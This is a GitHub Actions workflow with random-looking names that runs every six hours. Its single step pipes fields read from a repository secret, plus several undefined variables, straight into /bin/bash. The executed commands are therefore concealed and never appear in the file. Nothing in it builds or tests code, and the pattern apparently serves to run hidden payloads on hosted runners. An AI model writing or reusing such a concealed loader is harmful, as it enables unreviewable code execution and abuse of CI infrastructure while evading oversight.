name: yutaishan3484

on:
  workflow_dispatch:
  schedule:
    - cron: '19 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yutaishan3484
        env:
          kzgg58: ${{ secrets.kzgg58 }}
        run: |
          echo $kzgg58 | jq -r .fsih1308 | /bin/bash
          echo $oentm1257 | jq -r .azj2994 | /bin/bash
          echo $u5 | jq -r .oemk1320 | /bin/bash
          echo $qix115 | jq -r .h80 | /bin/bash
          echo $czy47783 | jq -r .s9 | /bin/bash
          echo $sbd22873 | jq -r .hjjc05404 | /bin/bash

